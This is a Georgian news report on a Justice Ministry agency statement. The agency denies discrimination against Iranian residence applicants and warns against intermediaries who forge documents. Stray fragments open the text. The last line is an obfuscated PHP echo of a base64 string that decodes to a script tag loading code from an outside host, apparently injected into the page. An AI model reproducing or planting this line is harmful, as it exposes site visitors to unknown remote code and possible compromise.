celsiusi
ავერსი შნაიდერი

ბოლო დროს ზოგიერთი მედიასაშუალებით გავრცელდა არაერთი ცრუ ინფორმაცია ირანის მოქალაქეებისათვის საქართველოში ცხოვრების უფლების მიცემის პროცესში სახელმწიფოს მხრიდან დისკრიმინაციული მიდგომების შესახებ, რაც გამოიხატებოდა თითქოსდა, მათთვის ხელოვნური ბარიერების შექმნასა და სხვა უკანონო ქმედებებში, – ამის შესახებ ნათქვამია იუსტიციის სამინისტროს სახელმწიფო სერვისების განვითარების სააგენტოს განცხადებაში.

უწყების ცნობით, მიგრაციულ პროცესებში ჩართული სახელმწიფო უწყებები, მათ შორის, იუსტიციის სამინისტროს სახელმწიფო სერვისების განვითარების სააგენტო საქართველოში ცხოვრების უფლების მიღების მსურველთა საქმეებს განიხილავს და გადაწყვეტილებებს იღებს მოქმედი კანონმდებლობის მოთხოვნათა მკაცრი დაცვით, ყოველგვარი დისკრიმინაციული მიდგომების გარეშე.

„აღნიშნულთან დაკავშირებით გვინდა განვმარტოთ, რომ მიგრაციულ პროცესებში ჩართული სახელმწიფო უწყებები, მათ შორის, იუსტიციის სამინისტროს სახელმწიფო სერვისების განვითარების სააგენტო საქართველოში ცხოვრების უფლების მიღების მსურველთა საქმეებს განიხილავს და გადაწყვეტილებებს იღებს მოქმედი კანონმდებლობის მოთხოვნათა მკაცრი დაცვით, ყოველგვარი დისკრიმინაციული მიდგომების გარეშე, აღნიშნულზე მეტყველებს 2022-2023 წლის სტატისტიკური მონაცემები. კერძოდ ხსენებულ პერიოდში საქართველოში ცხოვრების უფლება მიიღო ირანის 3 811-ზე მეტმა მოქალაქემ“, – აღნიშნულია განცხადებაში.

აქვე განმარტებულია, რომ ირანის ცალკეულ მოქალაქეებს, რომლებსაც უარი ეთქვათ საქართველოში ცხოვრების უფლებაზე, კავშირი ჰქონდათ ე.წ. საშუამავლო კომპანიებისა თუ ფიზიკური პირების მიერ შემუშავებულ არალეგალურ სქემებთან.

„ხსენებული ე.წ. შუამავლები გარკვეული გასამრჯელოს მიღების საფუძველზე იძლევიან ცრუ დაპირებებს, ირანის მოქალაქეებს უმზადებენ ფიქტიურ დოკუმენტაციას და მიზნად ისახავენ სახელმწიფო უწყებების შეცდომაში შეყვანას.

აღნიშნულიდან გამომდინარე, მოვუწოდებთ ირანის რესპუბლიკის მოქალაქეებს, ნუ ისარგებლებენ მსგავსი არალეგალური სერვისებით და ნებისმიერი მათთვის მნიშვნელოვან საკითხზე მიმართონ და ინფორმაცია მიიღონ იუსტიციის სამინისტროს სახელმწიფო სერვისების განვითარების სააგენტოდან.

აქვე გვსურს, მკაფიოდ განვაცხადოთ, რომ ნებისმიერ ფაქტსა თუ ინფორმაციას, მიგრაციის პოლიტიკის განხორციელების დროს ცალკეული უწყებების წარმომადგენლების მხრიდან განხორციელებულ უკანონო აქტივობებთან დაკავშირებით სახელმწიფოს მხრიდან მოჰყვება უმკაცრესი რეაგირება“, – აღნიშნულია განცხადებაში. 

210
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");